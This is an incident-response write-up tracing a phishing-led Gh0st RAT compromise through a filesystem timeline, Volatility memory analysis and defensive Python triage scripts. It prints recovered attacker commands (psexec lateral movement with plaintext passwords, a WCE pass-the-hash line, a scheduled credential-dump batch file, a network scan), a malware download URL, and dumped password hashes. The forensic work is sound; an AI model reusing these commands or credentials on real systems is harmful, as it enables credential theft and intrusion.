                                                                                                 10002 macb r/rrwxrwxrwx 0        0        11730-128-4 c:/WINDOWS/Prefetch/GS.EXE-3796DDD9.pf
                                                                                                         415744 .a.. r/rrwxrwxrwx 0        0        23392-128-3 c:/WINDOWS/system32/samsrv.dll

                                                    ping.exe is executed twice
                                                    Mon Nov 26 2012 23:15:44    13296 ...b r/rrwxrwxrwx 0        0        11731-128-4 c:/WINDOWS/Prefetch/PING.EXE-31216D26.pf
                                                    Mon Nov 26 2012 23:16:14    13296 mac. r/rrwxrwxrwx 0        0        11731-128-4 c:/WINDOWS/Prefetch/PING.EXE-31216D26.pf

                                                    wc.exe is executed
                                                    Mon Nov 26 2012 23:58:51    13208 ...b r/rrwxrwxrwx 0        0        11732-128-4 c:/WINDOWS/Prefetch/WC.EXE-21AD5E60.pf

                                                    ps.exe is executed
                                                    Tue Nov 27 2012 00:00:57    12542 ...b r/rrwxrwxrwx 0        0        11733-128-4 c:/WINDOWS/Prefetch/PS.EXE-09745CC1.pf

                                                    wc.exe is executed for a second time
                                                    Tue Nov 27 2012 00:10:44    13208 mac. r/rrwxrwxrwx 0        0        11732-128-4 c:/WINDOWS/Prefetch/WC.EXE-21AD5E60.pf

                                                    ps.exe is executed for a second time
                                                    Tue Nov 27 2012 00:13:59    12542 mac. r/rrwxrwxrwx 0        0        11733-128-4 c:/WINDOWS/Prefetch/PS.EXE-09745CC1.pf

                                                    system.dll is modified
                                                    Tue Nov 27 2012 00:44:16     5711 m... r/rrwxrwxrwx 0        0        11734-128-3 c:/WINDOWS/webui/system.dll

                                                     system.dll is born on the filesystem.  Based on the information above, I would think that system.dll was created on a different machine a little less than 4 minutes earlier and copied to this machine.
                                                    Tue Nov 27 2012 00:49:01     5711 .acb r/rrwxrwxrwx 0        0        11734-128-3 c:/WINDOWS/webui/system.dll

                                                    The same would be true for svchost.dll
                                                    Tue Nov 27 2012 00:56:43     1230 m... r/rrwxrwxrwx 0        0        11735-128-3 c:/WINDOWS/webui/svchost.dll
                                                    Tue Nov 27 2012 00:57:20     1230 .acb r/rrwxrwxrwx 0        0        11735-128-3 c:/WINDOWS/webui/svchost.dll

                                                    The same would be true for https.dll
                                                    Tue Nov 27 2012 01:00:34     5282 m... r/rrwxrwxrwx 0        0        11736-128-3 c:/WINDOWS/webui/https.dll
                                                    Tue Nov 27 2012 01:01:39     5282 .acb r/rrwxrwxrwx 0        0        11736-128-3 c:/WINDOWS/webui/https.dll

                                                    The same would be true for netstat.dll
                                                    Tue Nov 27 2012 01:11:40   109092 m... r/rrwxrwxrwx 0        0        11737-128-3 c:/WINDOWS/webui/netstat.dll
                                                    Tue Nov 27 2012 01:14:48   109092 .acb r/rrwxrwxrwx 0        0        11737-128-3 c:/WINDOWS/webui/netstat.dll

                                                    system5.bat is created
                                                    Tue Nov 27 2012 01:26:47       88 macb r/rrwxrwxrwx 0        0        11738-128-1 c:/WINDOWS/webui/system5.bat

                                                    wc.exe is accessed and would appear to be copied to the system32 directory
                                                    Tue Nov 27 2012 01:27:03   208384 .a.. r/rrwxrwxrwx 0        0        11725-128-3 c:/WINDOWS/webui/wc.exe
                                                                                                       208384 ...b r/rrwxrwxrwx 0        0        11739-128-3 c:/WINDOWS/system32/wc.exe

                                                     At the same time, at.exe was executed and a scheduled task was born
                                                    Tue Nov 27 2012 01:27:03      322 ...b r/rrwxrwxrwx 0        0        11740-128-1 c:/WINDOWS/Tasks/At1.job
                                                                                                      12948 ...b r/rrwxrwxrwx 0        0        11741-128-4 c:/WINDOWS/Prefetch/AT.EXE-2770DD18.pf

                                                     It would appear that the scheduled task was set to execute at 01:30:00.  wc.exe was executed via the scheduled task and h.out was created as a result.
                                                    Tue Nov 27 2012 01:30:00   208384 .ac. r/rrwxrwxrwx 0        0        11739-128-3 c:/WINDOWS/system32/wc.exe
                                                                                                             322 mac. r/rrwxrwxrwx 0        0        11740-128-1 c:/WINDOWS/Tasks/At1.job
                                                                                                             268 macb r/rrwxrwxrwx 0        0        11742-128-1 c:/WINDOWS/system32/h.out

                                                    Additional prefetch file created for wc.exe
                                                    Tue Nov 27 2012 01:30:10    10720 macb r/rrwxrwxrwx 0        0        11743-128-4 c:/WINDOWS/Prefetch/WC.EXE-06BFE764.pf

                                                    Additional prefetch entry created for at.exe
                                                    Tue Nov 27 2012 01:32:36    12948 mac. r/rrwxrwxrwx 0        0        11741-128-4 c:/WINDOWS/Prefetch/AT.EXE-2770DD18.pf

                                                    Responder activity identified
                                                    Tue Nov 27 2012 01:42:21    95104 m... r/rrwxrwxrwx 0        0        11744-128-3 c:/mdd.exe
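The two reading rules applied throughout the timeline above (a file whose modified time predates its birth time was copied in from elsewhere with its mtime preserved; a prefetch file's birth is the first run of that executable and each later modification another run) can be applied mechanically to a mactime-format timeline. The following Python is an added example and not part of the original write-up. It parses a constructed excerpt built from the timeline lines above (spacing normalized, continuation lines kept without a date column), and the function and variable names are my own.

```python
"""Triage a mactime-format timeline: files copied in with an old mtime, and repeat runs from prefetch."""
import re
from collections import defaultdict, namedtuple
from datetime import datetime

# Constructed excerpt: a subset of the timeline lines from this write-up, kept in mactime's
# text layout (a continuation line at the same timestamp carries no date column).
TIMELINE = """\
Mon Nov 26 2012 23:01:54 22428 macb r/rrwxrwxrwx 0 0 11722-128-4 c:/WINDOWS/Prefetch/SYMANTEC-1.43-1[2].EXE-3793B625.pf
Mon Nov 26 2012 23:03:21 26602 ...b r/rrwxrwxrwx 0 0 11706-128-4 c:/WINDOWS/Prefetch/IPCONFIG.EXE-2395F30B.pf
                         55808 .a.. r/rrwxrwxrwx 0 0 24145-128-3 c:/WINDOWS/system32/ipconfig.exe
Mon Nov 26 2012 23:06:34 381816 ...b r/rrwxrwxrwx 0 0 11710-128-3 c:/WINDOWS/ps.exe
Mon Nov 26 2012 23:06:35 381816 m.c. r/rrwxrwxrwx 0 0 11710-128-3 c:/WINDOWS/ps.exe
Mon Nov 26 2012 23:06:59 208384 m.cb r/rrwxrwxrwx 0 0 11725-128-3 c:/WINDOWS/webui/wc.exe
Mon Nov 26 2012 23:06:59 208384 m... r/rrwxrwxrwx 0 0 11739-128-3 c:/WINDOWS/system32/wc.exe
Mon Nov 26 2012 23:07:31 26602 mac. r/rrwxrwxrwx 0 0 11706-128-4 c:/WINDOWS/Prefetch/IPCONFIG.EXE-2395F30B.pf
Mon Nov 26 2012 23:10:35 6768 ...b r/rrwxrwxrwx 0 0 11729-128-4 c:/WINDOWS/Prefetch/SL.EXE-010E2A23.pf
Mon Nov 26 2012 23:11:33 6768 mac. r/rrwxrwxrwx 0 0 11729-128-4 c:/WINDOWS/Prefetch/SL.EXE-010E2A23.pf
Tue Nov 27 2012 00:44:16 5711 m... r/rrwxrwxrwx 0 0 11734-128-3 c:/WINDOWS/webui/system.dll
Tue Nov 27 2012 00:49:01 5711 .acb r/rrwxrwxrwx 0 0 11734-128-3 c:/WINDOWS/webui/system.dll
Tue Nov 27 2012 01:27:03 208384 .a.. r/rrwxrwxrwx 0 0 11725-128-3 c:/WINDOWS/webui/wc.exe
                         208384 ...b r/rrwxrwxrwx 0 0 11739-128-3 c:/WINDOWS/system32/wc.exe
"""

Event = namedtuple("Event", "ts macb inode path")

# mactime text line: [date] size macb perms uid gid inode path
LINE = re.compile(
    r"^(?:(?P<ts>[A-Z][a-z]{2} [A-Z][a-z]{2} \d{2} \d{4} \d{2}:\d{2}:\d{2})\s+)?"
    r"(?P<size>\d+)\s+(?P<macb>[macb.]{4})\s+(?P<perm>\S+)\s+(?P<uid>\d+)\s+(?P<gid>\d+)\s+"
    r"(?P<inode>\S+)\s+(?P<path>.+?)\s*$"
)


def parse_timeline(text):
    """Return Events; a line without a date column inherits the previous line's timestamp."""
    events, last_ts = [], None
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        if m["ts"]:
            last_ts = datetime.strptime(m["ts"], "%a %b %d %Y %H:%M:%S")
        if last_ts is not None:
            events.append(Event(last_ts, m["macb"], m["inode"], m["path"]))
    return events


def copied_in_files(events):
    """Paths whose earliest content-modified (m) time is older than their birth (b) time here.
    A copy keeps the source mtime but gets a fresh birth time on the destination volume,
    so m < b means the file was created elsewhere and copied in."""
    birth, first_mod = {}, {}
    for e in events:
        if "b" in e.macb:
            birth[e.path] = e.ts
        if "m" in e.macb:
            first_mod.setdefault(e.path, e.ts)  # timeline is sorted: first m seen is the earliest
    return sorted(p for p in birth if p in first_mod and first_mod[p] < birth[p])


def prefetch_run_count(events):
    """Approximate executions per .pf file: its birth is the first run, each later m another run.
    (XP keeps one .pf per executable path; the run counter inside the .pf is the authoritative value.)"""
    runs = defaultdict(set)
    for e in events:
        if e.path.lower().endswith(".pf") and ("b" in e.macb or "m" in e.macb):
            runs[e.path].add(e.ts)
    return {p: len(ts) for p, ts in runs.items()}


if __name__ == "__main__":
    evs = parse_timeline(TIMELINE)
    for p in copied_in_files(evs):
        print("copied in with preserved mtime:", p)
    for p, n in sorted(prefetch_run_count(evs).items()):
        print(f"{n} run(s):", p)
```

On the excerpt this flags c:/WINDOWS/webui/system.dll and c:/WINDOWS/system32/wc.exe as copied in, and counts two runs each for ipconfig and sl.exe. A birth time later than the mtime is an indicator rather than proof (archive extraction and timestamp-preserving copy tools produce the same pattern), which is why the net use share mapping found later in memory matters as corroboration.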

                                                    Memory analysis


                                                    Original phish.  Notice the link pointing the user to http://58.64.132.8/download/Symantec-1.43-1.exe

                                                      34435092 ceived: from ubuntu-router ([172.16.150.8]) by dc-ustxhou.petro-market.org with Microsoft SMTPSVC(6.0.3790.0);
                                                      34435204       Mon, 26 Nov 2012 14:00:08 -0600
                                                      34435239 Received: from d0793h (d0793h.petro-markets.info [58.64.132.141])
                                                      34435306      by ubuntu-router (8.14.3/8.14.3/Debian-9.2ubuntu1) with SMTP id qAQK06Co005842;
                                                      34435388      Mon, 26 Nov 2012 15:00:07 -0500
                                                      34435422 Message-ID: <FCE1C36C7BBC46AFB7C2A251EA868B8B@d0793h>
                                                      34435477 From: "Security Department" <isd@petro-markets.info>
                                                      34435531 To: <amirs@petro-market.org>, <callb@petro-market.org>,
                                                      34435588         <wrightd@petro-market.org>
                                                      34435624 Subject: Immediate Action
                                                      34435651 Date: Mon, 26 Nov 2012 14:59:38 -0500
                                                      34435690 MIME-Version: 1.0
                                                      34435709 Content-Type: multipart/alternative;
                                                      34435747      boundary="----=_NextPart_000_0015_01CDCBE6.A7B92DE0"
                                                      34435802 X-Priority: 3
                                                      34435817 X-MSMail-Priority: Normal
                                                      34435844 X-Mailer: Microsoft Outlook Express 6.00.2900.5512
                                                      34435896 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5512
                                                      34435954 Return-Path: isd@petro-markets.info
                                                      34435991 X-OriginalArrivalTime: 26 Nov 2012 20:00:08.0432 (UTC) FILETIME=[A2ABBF00:01CDCC10]
                                                      34436078 This is a multi-part message in MIME format.
                                                      34436126 ------=_NextPart_000_0015_01CDCBE6.A7B92DE0
                                                      34436171 Content-Type: text/plain;
                                                      34436198      charset="iso-8859-1"
                                                      34436221 Content-Transfer-Encoding: quoted-printable
                                                      34436268 Attn: Immediate Action is Required!!
                                                      34436308 The IS department is requiring that all associates update to the new =
                                                      34436380 version of anti-virus.  This is critical and must be done ASAP!  Failure =
                                                      34436456 to update anti-virus may result in negative actions.
                                                      34436512 Please download the new anti-virus and follow the instructions.  Failure =
                                                      34436588 to install this anti-virus may result in loosing your job!
                                                      34436650 Please donwload at http://58.64.132.8/download/Symantec-1.43-1.exe
                                                      34436720 Regards,
                                                      34436730 The IS Department

                                                    Evidence the user callb clicked the link in the phish
                                                    Visited: callb@http://58.64.132.8/download/Symantec-1.43-1.exe

                                                    Finding the backdoor in memory
                                                     1. Try to determine whether we can locate a network connection and associate a pid with it.   We will do this using Volatility, and it looks like pid 1024 is what we want to take a closer look at.
                                                    vol.py connscan -f memdump.bin --profile=WinXPSP3x86
                                                    Offset(P)  Local Address             Remote Address            Pid
                                                    ---------- ------------------------- ------------------------- ---
                                                    0x01f60850 0.0.0.0:0                 1.0.0.0:0                 36569092
                                                    0x01ffa850 172.16.150.20:1291        58.64.132.141:80          1024
                                                    0x0201f850 172.16.150.20:1292        172.16.150.10:445         4
                                                    0x02084e68 172.16.150.20:1281        172.16.150.10:389         628
                                                    0x020f8988 172.16.150.20:2862        172.16.150.10:135         696
                                                    0x02201008 172.16.150.20:1280        172.16.150.10:389         628
                                                    0x18615850 172.16.150.20:1292        172.16.150.10:445         4
                                                    0x189e8850 172.16.150.20:1291        58.64.132.141:80          1024
                                                    0x18a97008 172.16.150.20:1280        172.16.150.10:389         628
                                                    0x18b8e850 0.0.0.0:0                 1.0.0.0:0                 36569092
                                                    0x18dce988 172.16.150.20:2862        172.16.150.10:135         696

                                                    2. We now want to find out exactly what process is running with that pid.  Again we will use volatility for this.
                                                    vol.py pslist -f memdump.bin --profile=WinXPSP3x86 |grep 1024
                                                    Volatile Systems Volatility Framework 2.2
                                                    0x820b3da0 svchost.exe            1024    680     76     1645      0      0 2012-11-26 22:03:32                      
                                                    0x82045da0 wuauclt.exe            1628   1024      3      142      0      0 2012-11-26 22:04:43                      
                                                    0x82049690 wc.exe                  364   1024      1       27      0      0 2012-11-27 01:30:00 

                                                     3. Once again we will use Volatility to see what loaded DLLs are running under pid 1024.  We see 6to4ex.dll, which was the file created on the filesystem at the same time the dropper was executed.
                                                    vol.py dlllist -f memdump.bin --profile=WinXPSP3x86 -p 1024   
                                                    Volatile Systems Volatility Framework 2.2
                                                    skipping…
                                                    0x10000000    0x1c000 c:\windows\system32\6to4ex.dll

                                                     4.  I will now use Volatility to carve out the DLL and see if I can determine whether this is in fact our Gh0st RAT.  Then I will use strings as a quick way to determine whether this binary can be associated with the backdoor.
                                                    vol.py dlldump -f memdump.bin --profile=WinXPSP3x86 -p 1024 --dump-dir=dll
                                                    Volatile Systems Volatility Framework 2.2
                                                    Process(V) Name                 Module Base Module Name          Result
                                                    ---------- -------------------- ----------- -------------------- ------
                                                    skipping…
                                                    0x820b3da0 svchost.exe          0x010000000 6to4ex.dll           OK: module.1024.20b3da0.10000000.dll

                                                    strings dll/module.1024.20b3da0.10000000.dll |more
                                                    skipping…
                                                    Gh0st Update
                                                    Global\Gh0st %d
                                                    (note: there are additional indicators in the binary that we will use to build detection for this backdoor)

                                                     ipconfig being run via psexec (ps.exe).  It looks like it was targeting two specific machines using credentials most likely obtained via hash dumping.

                                                     111530668 C:\WINDOWS\System32\svchost.exe - ps.exe \\172.16.223.47 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig0e
                                                     111532380 C:\WINDOWS\System32\svchost.exe - ps.exe \\172.16.150.10 -u petro1-market\callb -p Mar1ners@4655 -accepteula cmd /c ipconfig

                                                    Because I saw gs.exe get executed plus samsrv.dll get accessed at the same time I had a suspicion that hash dumping occurred.  My suspicions grew stronger when I saw ps.exe being executed with presumably valid credentials.  I will use the following grep command to search for hashes in the memory strings file.

                                                     grep -E '[a-f0-9]{32}:[a-f0-9]{32}' mem.str

                                                     11377473 PETRO-MARKET\callb::115b24322c11908c85140f5d33b6232f:40d1d232d5f731ea966913ea458a16e7:::
                                                      11377563 PETRO-MARKET\ENG-USTXHOU-148$::00000000000000000000000000000000:d6717f1e5252fa87ed40af8c46d8b1e2:::
                                                      11377664 PETRO-MARKET\ENG-USTXHOU-148$::00000000000000000000000000000000:d6717f1e5252fa87ed40af8c46d8b1e2:::
                                                      11377765 Administrator(current):500:b7ae6225a35c376da8d03b0a558fdf1f:159cb99e6dfd8830d25e8592c505d4be:::
                                                      11377862 Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
                                                      11377951 HelpAssistant(current):1000:42dbf333659cabcd0b546a25124a5476:dfd19a421051e8329e0c7b5aa7fe7dbe:::
                                                      11378049 SUPPORT_388945a0(current):1002:aad3b435b51404eeaad3b435b51404ee:5168fdd9d699311c78acabde3c849622:::
                                                      11378150 sysbackup(current):1004:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057:::
                                                     145783076 xe -s sysbackup:current:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057
                                                     188543748 xe -s sysbackup:current:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057
                                                     219844660 IIS-SARIYADH-03\IUSR_IIS-SARIYADH-03::a56070d051fea2efc7b9d6cef7a31133:34cda5be1d8a5a95d16760173d9b953f:::
                                                     219844768 PETRO-MARKET\saadmin::fb288acceb76f0688625caa1be8406ea:7f0de79304fa2dafd770b917d7d8a545:::
                                                     219844860 PETRO-MARKET\IIS-SARIYADH-03$::00000000000000000000000000000000:9e185f46ee242c35d328eacc15bc62ab:::
                                                     219844961 PETRO-MARKET\IIS-SARIYADH-03$::00000000000000000000000000000000:9e185f46ee242c35d328eacc15bc62ab:::
                                                     219845062 Administrator(current):500:b7ae6225a35c376da8d03b0a558fdf1f:159cb99e6dfd8830d25e8592c505d4be:::
                                                     219845159 ASPNET(current):1007:5d7be66190782a7e815c3e85ee68a20f:0017e6c73eec714ad84200bc49752450:::
                                                     219845250 Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
                                                     219845339 IUSR_IIS-SARIYADH-03(current):1004:a56070d051fea2efc7b9d6cef7a31133:34cda5be1d8a5a95d16760173d9b953f:::
                                                     219845444 IWAM_IIS-SARIYADH-03(current):1005:3cfdff81d718e57a97db95a9e5c85a61:3c96b32a0a60fad5d5e43b71a2088471:::
                                                     219845549 SUPPORT_388945a0(current):1001:aad3b435b51404eeaad3b435b51404ee:a0b581112e87b82bce9201ce197fdd93:::
                                                     219845650 sysbackup(current):1008:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057:::
                                                     219845744 sysbackup(hist_01):1008:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057:::
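To turn a dump like the one above into a scoping list rather than a pile of hashes, a responder wants two things: which accounts still have a real LM hash stored (legacy, weak storage that should be disabled), and which local accounts share one password across hosts, as sysbackup does above with the same NT hash under RIDs 1004 and 1008. The script below is an added example and not part of the original post. It parses a constructed excerpt of the pwdump-style strings above (offsets kept), and the helper names are my own.

```python
"""Scope a credential dump found in memory: LM-enabled accounts and local passwords reused across hosts."""
import re
from collections import defaultdict, namedtuple

# Constructed excerpt of the pwdump-style lines from the memory strings above (string offsets kept).
# The "xe -s ..." line is a WCE command fragment, not a dump record, and is ignored by the parser.
STRINGS_EXCERPT = r"""
 11377473 PETRO-MARKET\callb::115b24322c11908c85140f5d33b6232f:40d1d232d5f731ea966913ea458a16e7:::
  11377563 PETRO-MARKET\ENG-USTXHOU-148$::00000000000000000000000000000000:d6717f1e5252fa87ed40af8c46d8b1e2:::
  11377765 Administrator(current):500:b7ae6225a35c376da8d03b0a558fdf1f:159cb99e6dfd8830d25e8592c505d4be:::
  11377862 Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  11378150 sysbackup(current):1004:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057:::
 145783076 xe -s sysbackup:current:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057
 219844860 PETRO-MARKET\IIS-SARIYADH-03$::00000000000000000000000000000000:9e185f46ee242c35d328eacc15bc62ab:::
 219845062 Administrator(current):500:b7ae6225a35c376da8d03b0a558fdf1f:159cb99e6dfd8830d25e8592c505d4be:::
 219845650 sysbackup(current):1008:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057:::
 219845744 sysbackup(hist_01):1008:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057:::
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string
NULL_LM = "0" * 32                              # placeholder the dumper emits for machine accounts

# user:rid:lm:nt:::  (rid is empty for the domain/cached entries)
HASH_LINE = re.compile(r"(?P<user>[^\s:]+):(?P<rid>[^:]*):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::")
Cred = namedtuple("Cred", "account rid lm nt")


def parse_hash_lines(text):
    """Extract dump records; (current)/(hist_NN) suffixes are folded into the account name."""
    creds = []
    for line in text.splitlines():
        m = HASH_LINE.search(line)
        if m:
            account = re.sub(r"\((current|hist_\d+)\)$", "", m["user"])
            creds.append(Cred(account, m["rid"], m["lm"], m["nt"]))
    return creds


def lm_enabled_accounts(creds):
    """Accounts still carrying a real LM hash (case-insensitive, 14-char max, trivially crackable)."""
    return sorted({c.account for c in creds if c.lm not in (EMPTY_LM, NULL_LM)})


def reused_local_passwords(creds):
    """Same local account name and NT hash under different RIDs: different SAMs hold the same
    password, i.e. one local admin password shared across hosts (the sysbackup 1004/1008 case).
    RID 500 is Administrator on every host, so that account cannot be separated this way."""
    rids_by_key = defaultdict(set)
    for c in creds:
        if c.rid and c.nt != EMPTY_NT:
            rids_by_key[(c.account, c.nt)].add(c.rid)
    return sorted(account for (account, _), rids in rids_by_key.items() if len(rids) > 1)


if __name__ == "__main__":
    creds = parse_hash_lines(STRINGS_EXCERPT)
    print("LM hash still stored for:", lm_enabled_accounts(creds))
    print("local password reused across hosts:", reused_local_passwords(creds))
```

On the excerpt the LM list is Administrator, PETRO-MARKET\callb and sysbackup, and sysbackup is reported as reused. The built-in Administrator has to be compared by hand because its RID is 500 everywhere; both Administrator lines above carry the same hash. The fixes this points at are unique per-host local administrator passwords (LAPS) and disabling LM hash storage (the NoLMHash policy), alongside resetting every account listed.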

                                                    Evidence of gsecdump found in memory

                                                      57731224 unable to start gsecdump as service
                                                      57731260 system
                                                      57731268 help
                                                      57731276 dump_all,a
                                                      57731288 dump all secrets
                                                      57731308 dump_hashes,s
                                                      57731324 dump hashes from SAM/AD
                                                      57731348 dump_lsa,l
                                                      57731360 dump lsa secrets
                                                      57731380 dump_usedhashes,u
                                                      57731400 dump hashes from active logon sessions
                                                      57731440 dump_wireless,w
                                                      57731456 dump microsoft wireless connections
                                                      57731492 help,h
                                                      57731500 show help
                                                      57731512 system,S
                                                      57731524 run as localsystem
                                                      57731544 gsecdump v0.7 by Johannes Gumbel (johannes.gumbel@truesec.se)
                                                      57731607 usage: gsecdump [options]
                                                      57731636 options
                                                      57731644 --iamservice

                                                     An additional discovery is the use of pass-the-hash via Windows Credentials Editor (wc.exe).  We see the attacker elevating privileges to sysbackup.

                                                    288587364 \WINDOWS\System32\svchost.exe - wc.exe -s sysbackup:current:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057

                                                     We also see the attacker grabbing locally cached passwords via WCE
                                                    33660952 wc.exe -w
                                                      33660963 WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
                                                      33661089 Use -h for help.
                                                      33661111 callb\PETRO-MARKET:Mar1ners@4655
                                                      33661145 NETWORK SERVICE\PETRO-MARKET:+A;dhzj%o<8xpD@,p5v)C:p2%?1Nkx&5OU!c[wt5BgV'r4p7/lWc[`XWPpN/.d$I.Ubc-7c $-ap(@?I7S6SD(U-zbdQHgT2& u\rgk(ga?y+GGE*E_0/2Qs
                                                      33661296 ENG-USTXHOU-148$\PETRO-MARKET:+A;dhzj%o<8xpD@,p5v)C:p2%?1Nkx&5OU!c[wt5BgV'r4p7/lWc[`XWPpN/.d$I.Ubc-7c $-ap(@?I7S6SD(U-zbdQHgT2& u\rgk(ga?y+GGE*E_0/2Qs

                                                     There was not much information regarding ra.exe, but we also did not see that file executed at all.

                                                     It appears that sl.exe is ScanLine from Foundstone

                                                      92493044 Foundstone Inc.
                                                      92493082 FileDescription
                                                      92493116 ScanLine
                                                      92493142 FileVersion
                                                      92493168 1, 0, 1, 0
                                                      92493198 InternalName
                                                      92493224 ScanLine
                                                      92493250 LegalCopyright
                                                      92493280 Copyright
                                                      92493302  2002 Foundstone Inc.
                                                      92493354 LegalTrademarks
                                                      92493388 Copyright
                                                      92493410  2002 Foundstone Inc.
                                                      92493462 OriginalFilename
                                                      92493496 sl.exe
                                                      92493518 PrivateBuild
                                                      92493550 ProductName
                                                      92493576 ScanLine
                                                      92493602 ProductVersion

                                                     We also see evidence of what was being scanned: the 172.16.150.0/24 network, for ports 445, 80, 443, 21 and 1433
                                                    \WINDOWS\System32\svchost.exe - sl.exe -bht 445,80,443,21,1433 172.16.150.1-254 

                                                     A net use command that appears to come from the Gh0st RAT (svchost.exe), mapping a share on a remote machine.  This may explain how the DLLs appear to have been copied from a different machine, based on the MAC times.
                                                    \WINDOWS\System32\svchost.exe - net use z: \\172.16.223.47\z

                                                     Note: this looks like normal command-line share mapping (cmd.exe)
                                                    \WINDOWS\system32\cmd.exe - net use r: \\172.16.150.10\ITShare


                                                     MFT entry for system5.bat found in memory

                                                    0000090: 0000 0000 0000 0000 0000 0000 0000 4649  ..............FI
                                                    00000a0: 4c45 3000 0300 dcdc 6905 0000 0000 0300  LE0.....i.......
                                                    00000b0: 0100 3800 0100 8001 0000 0004 0000 0000  ..8.............
                                                    00000c0: 0000 0000 0000 0300 0000 da2d 0000 0400  ...........-....
                                                    00000d0: 0000 0000 0000 1000 0000 6000 0000 0000  ..........`.....
                                                    00000e0: 0000 0000 0000 4800 0000 1800 0000 4b81  ......H.......K.
                                                    00000f0: d144 3ecc cd01 aee3 d344 3ecc cd01 aee3  .D>......D>.....
                                                    0000100: d344 3ecc cd01 aee3 d344 3ecc cd01 2000  .D>......D>... .
                                                    0000110: 0000 0000 0000 0000 0000 0000 0000 0000  ................
                                                    0000120: 0000 1301 0000 0000 0000 0000 0000 0000  ................
                                                    0000130: 0000 0000 0000 3000 0000 7000 0000 0000  ......0...p.....
                                                    0000140: 0000 0000 0200 5800 0000 1800 0100 841d  ......X.........
                                                    0000150: 0000 0000 0200 4b81 d144 3ecc cd01 4b81  ......K..D>...K.
                                                    0000160: d144 3ecc cd01 4b81 d144 3ecc cd01 4b81  .D>...K..D>...K.
                                                    0000170: d144 3ecc cd01 0000 0000 0000 0000 0000  .D>.............
                                                    0000180: 0000 0000 0000 2000 0000 0000 0000 0b03  ...... .........
                                                    0000190: 7300 7900 7300 7400 6500 6d00 3500 2e00  s.y.s.t.e.m.5...
                                                    00001a0: 6200 6100 7400 8000 0000 7000 0000 0000  b.a.t.....p.....
                                                    00001b0: 1800 0000 0100 5800 0000 1800 0000 4065  ......X.......@e
                                                    00001c0: 6368 6f20 6f66 660d 0a63 6f70 7920 633a  cho off..copy c:
                                                    00001d0: 5c77 696e 646f 7773 5c77 6562 7569 5c77  \windows\webui\w
                                                    00001e0: 632e 6578 6520 633a 5c77 696e 646f 7773  c.exe c:\windows
                                                    00001f0: 5c73 7973 7465 6d33 320d 0a61 7420 3139  \system32..at 19
                                                    0000200: 3a33 3020 7763 2e65 7865 202d 6520 2d6f  :30 wc.exe -e -o
                                                    0000210: 2068 2e6f 7574 ffff ffff 8279 4711 0000   h.out.....yG...

                                                    The MFT entry for h.out showing the captured hashes

                                                    0000310: 4649 4c45 3000 0300 e216 6a05 0000 0000  FILE0.....j.....
                                                    0000320: 0400 0100 3800 0100 3002 0000 0004 0000  ....8...0.......
                                                    0000330: 0000 0000 0000 0000 0300 0000 de2d 0000  .............-..
                                                    0000340: 0500 0000 0000 0000 1000 0000 6000 0000  ............`...
                                                    0000350: 0000 0000 0000 0000 4800 0000 1800 0000  ........H.......
                                                    0000360: b25c afb7 3ecc cd01 b25c afb7 3ecc cd01  .\..>....\..>...
                                                    0000370: b25c afb7 3ecc cd01 b25c afb7 3ecc cd01  .\..>....\..>...
                                                    0000380: 2000 0000 0000 0000 0000 0000 0000 0000   ...............
                                                    0000390: 0000 0000 c806 0000 0000 0000 0000 0000  ................
                                                    00003a0: 0000 0000 0000 0000 3000 0000 6800 0000  ........0...h...
                                                    00003b0: 0000 0000 0000 0200 4c00 0000 1800 0100  ........L.......
                                                    00003c0: 1d00 0000 0000 0100 b25c afb7 3ecc cd01  .........\..>...
                                                    00003d0: b25c afb7 3ecc cd01 b25c afb7 3ecc cd01  .\..>....\..>...
                                                    00003e0: b25c afb7 3ecc cd01 0000 0000 0000 0000  .\..>...........
                                                    00003f0: 0000 0000 0000 0000 2000 0000 0000 0000  ........ .......
                                                    0000400: 0503 6800 2e00 6f00 7500 7400 0000 0000  ..h...o.u.t.....
                                                    0000410: 8000 0000 2801 0000 0000 1800 0000 0100  ....(...........
                                                    0000420: 0c01 0000 1800 0000 6361 6c6c 623a 5045  ........callb:PE
                                                    0000430: 5452 4f2d 4d41 524b 4554 3a31 3135 4232  TRO-MARKET:115B2
                                                    0000440: 3433 3232 4331 3139 3038 4338 3531 3430  4322C11908C85140
                                                    0000450: 4635 4433 3342 3632 3332 463a 3430 4431  F5D33B6232F:40D1
                                                    0000460: 4432 3332 4435 4637 3331 4541 3936 3639  D232D5F731EA9669
                                                    0000470: 3133 4541 3435 3841 3136 4537 0d0a 454e  13EA458A16E7..EN
                                                    0000480: 472d 5553 5458 484f 552d 3134 3824 3a50  G-USTXHOU-148$:P
                                                    0000490: 4554 524f 2d4d 4152 4b45 543a 3030 3030  ETRO-MARKET:0000
                                                    00004a0: 3030 3030 3030 3030 3030 3030 3030 3030  0000000000000000
                                                    00004b0: 3030 3030 3030 3030 3030 3030 3a44 3637  000000000000:D67
